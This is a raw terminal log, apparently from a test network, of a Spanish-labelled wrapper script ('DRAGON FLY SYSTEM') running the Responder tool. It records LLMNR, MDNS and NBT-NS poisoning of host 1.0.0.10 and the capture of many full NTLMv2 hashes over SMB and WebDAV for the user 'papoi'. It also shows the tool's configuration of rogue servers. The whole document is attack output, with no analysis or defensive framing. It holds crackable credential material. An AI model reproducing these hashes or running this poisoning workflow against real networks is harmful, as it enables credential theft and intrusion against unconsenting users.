[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:d232d01d0085fbe4:C97DC99F9661275BAC24A12EBA74919E:010100000000000000E0C2035DF0DC014D3DE316F47411CF0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:02b55cccbf5f4364:5154ED0647FD367AA61A9329EB8BD3C0:010100000000000000E0C2035DF0DC01A2EFE49B7BB6FC8D0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[HTTP][0m Sending NTLM authentication request to 1.0.0.10

[1;34m[WebDAV][0m NTLMv2 Client   : [0;33m1.0.0.10[0m

[1;34m[WebDAV][0m NTLMv2 Username : [0;33m.\papoi[0m

[1;34m[WebDAV][0m NTLMv2 Hash     : [0;33mpapoi::.:6f373941abae2261:7D6AF6CDC5039E0FD6F8FBC7F7CB1C99:0101000000000000D8CA8A8E7EF0DC018577FF58703D9DD30000000002000800540057003700590001001E00570049004E002D003800450042004F004A004600370056005600430042000400140054005700370059002E004C004F00430041004C0003003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A001000000000000000000000000000000000000900280048005400540050002F0064007200610067006F006E0066006C0079002E006C006F00630061006C000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:406a2c97ea661ada:95FAA6B519746BB8DDCE043AD8C2848A:010100000000000000E0C2035DF0DC01F78C548AC11D61680000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:1bfa8fd7ffd9ccde:0CCCF066513406A09232790B2A22A255:010100000000000000E0C2035DF0DC0119244CC8133B34F10000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:daf0cc6ff1fef43d:04655B6A75FC0AC8A7C03E9EF1D00D0A:010100000000000000E0C2035DF0DC01243F1846560AE6CF0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[HTTP][0m Sending NTLM authentication request to 1.0.0.10

[1;34m[WebDAV][0m NTLMv2 Client   : [0;33m1.0.0.10[0m

[1;34m[WebDAV][0m NTLMv2 Username : [0;33m.\papoi[0m

[1;34m[WebDAV][0m NTLMv2 Hash     : [0;33mpapoi::.:540423f2e8fdd0aa:A5091A3B058596DDEE81E0212FEE56B1:01010000000000004F2CC78E7EF0DC01E38BEF3DF509F1B90000000002000800540057003700590001001E00570049004E002D003800450042004F004A004600370056005600430042000400140054005700370059002E004C004F00430041004C0003003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0048005400540050002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:066e2d62859b6854:4623E37CDFE16ED93E495EDBD57A6837:010100000000000000E0C2035DF0DC017F1AD78EE84261980000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local[0m
[1;32m[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly[0m

[1;34m[SMB][0m NTLMv2-SSP Client   : [0;33m1.0.0.10[0m

[1;34m[SMB][0m NTLMv2-SSP Username : [0;33m.\papoi[0m

[1;34m[SMB][0m NTLMv2-SSP Hash     : [0;33mpapoi::.:d01654e9520dabbc:08B53E91CB50893386BA2AB3F6CCB3CD:010100000000000000E0C2035DF0DC01A368884FF6E353FE0000000002000800540057003700590001001E00570049004E002D003800450042004F004A0046003700560056004300420004003400570049004E002D003800450042004F004A004600370056005600430042002E0054005700370059002E004C004F00430041004C000300140054005700370059002E004C004F00430041004C000500140054005700370059002E004C004F00430041004C000700080000E0C2035DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000[0m

[*] Deteniendo procesos y restaurando red...
[+] Sistema restaurado. ¡Cacería finalizada!

[!] DRAGON FLY SYSTEM
[*] Configurando interfaz: eth1
[*] Levantando interfaz de red...
[*] Asignando IP estática local a eth1...
[*] Inyectando rutas estáticas para la comunicación con la víctima...
[*] Lanzando servidor DHCP (dnsmasq)...

[+] INTERFAZ LISTA: eth1
[+] OBJETIVO: Captura de hashes NTLM / LLMNR
__
.----.-----.-----.-----.-----.-----.--|  |.-----.----.
|   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
|__| |_____|_____|   __|_____|__|__|_____||_____|__|
|__|

[!] Warning: No link-local IPv6 found, using global fd17:625c:f037:2:bdac:3a7b:877d:38c2
[!] This address may not be reachable on local network!

[*] Tips jar:
USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
LLMNR                      [ON]
NBT-NS                     [ON]
MDNS                       [ON]
DNS                        [ON]
DHCP                       [OFF]
DHCPv6                     [OFF]

[+] Servers:
HTTP server                [ON]
HTTPS server               [ON]
WPAD proxy                 [ON]
Auth proxy                 [OFF]
SMB server                 [ON]
Kerberos server            [ON]
SQL server                 [ON]
FTP server                 [ON]
IMAP server                [ON]
POP3 server                [ON]
SMTP server                [ON]
DNS server                 [ON]
LDAP server                [ON]
MQTT server                [ON]
RDP server                 [ON]
DCE-RPC server             [ON]
WinRM server               [ON]
SNMP server                [ON]

[+] HTTP Options:
Always serving EXE         [OFF]
Serving EXE                [OFF]
Serving HTML               [OFF]
Upstream Proxy             [OFF]

[+] Poisoning Options:
Analyze Mode               [OFF]
Force WPAD auth            [ON]
Force Basic Auth           [OFF]
Force LM downgrade         [OFF]
Force ESS downgrade        [OFF]

[+] Generic Options:
Responder NIC              [eth1]
Responder IP               [1.0.0.1]
Responder IPv6             [fd17:625c:f037:2:bdac:3a7b:877d:38c2]
Challenge set              [random]
Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD  ['_DOSVC']
TTL for poisoned response  [default]

[+] Current Session Variables:
Responder Machine Name     [WIN-ECBDK30QHVW]
Responder Domain Name      [F7UL.LOCAL]
Responder DCE-RPC Port     [46898]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[!] Error starting TCP server on port 53, check permissions or other servers running.
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly

[SMB] NTLMv2-SSP Client   : 1.0.0.10

[SMB] NTLMv2-SSP Username : .\papoi

[SMB] NTLMv2-SSP Hash     : papoi::.:45f64e7bac141780:16EA3921007A603AC50A012BC0A1302F:0101000000000000800F84BF5DF0DC011E106BDC8AF748A900000000020008004600370055004C0001001E00570049004E002D0045004300420044004B0033003000510048005600570004003400570049004E002D0045004300420044004B003300300051004800560057002E004600370055004C002E004C004F00430041004C00030014004600370055004C002E004C004F00430041004C00050014004600370055004C002E004C004F00430041004C0007000800800F84BF5DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly

[SMB] NTLMv2-SSP Client   : 1.0.0.10

[SMB] NTLMv2-SSP Username : .\papoi

[SMB] NTLMv2-SSP Hash     : papoi::.:bcb8499ada0ecea6:B4FD5D2B21D1EF23013BC71B4E0ACD53:0101000000000000800F84BF5DF0DC0124CC340E36F3D8FB00000000020008004600370055004C0001001E00570049004E002D0045004300420044004B0033003000510048005600570004003400570049004E002D0045004300420044004B003300300051004800560057002E004600370055004C002E004C004F00430041004C00030014004600370055004C002E004C004F00430041004C00050014004600370055004C002E004C004F00430041004C0007000800800F84BF5DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly

[SMB] NTLMv2-SSP Client   : 1.0.0.10

[SMB] NTLMv2-SSP Username : .\papoi

[SMB] NTLMv2-SSP Hash     : papoi::.:98ae6d3618da75b9:6838FFF95E66659D8D87E4898218B127:0101000000000000800F84BF5DF0DC01344566EE4E85633D00000000020008004600370055004C0001001E00570049004E002D0045004300420044004B0033003000510048005600570004003400570049004E002D0045004300420044004B003300300051004800560057002E004600370055004C002E004C004F00430041004C00030014004600370055004C002E004C004F00430041004C00050014004600370055004C002E004C004F00430041004C0007000800800F84BF5DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly

[SMB] NTLMv2-SSP Client   : 1.0.0.10

[SMB] NTLMv2-SSP Username : .\papoi

[SMB] NTLMv2-SSP Hash     : papoi::.:3b12e1882d2ca9ef:83905B9EE6DC8CD5E2B7B7515BD5C8CB:0101000000000000800F84BF5DF0DC01EBC15EBD8BCE25D200000000020008004600370055004C0001001E00570049004E002D0045004300420044004B0033003000510048005600570004003400570049004E002D0045004300420044004B003300300051004800560057002E004600370055004C002E004C004F00430041004C00030014004600370055004C002E004C004F00430041004C00050014004600370055004C002E004C004F00430041004C0007000800800F84BF5DF0DC0106000400020000000800300030000000000000000100000000200000892C8DA9E535F8A4A356DDCBED5AFDBB4FBDDD4254537EAA13EE82E77989F9FA0A0010000000000000000000000000000000000009001C0063006900660073002F0064007200610067006F006E0066006C0079000000000000000000
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [MDNS] Poisoned answer sent to 1.0.0.10        for name dragonfly.local
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly
[*] [LLMNR]  Poisoned answer sent to 1.0.0.10 for name dragonfly

[SMB] NTLMv2-SSP Client   : 1.0.0.10

[*] Deteniendo procesos y restaurando red...
[+] Sistema restaurado. ¡Cacería finalizada!
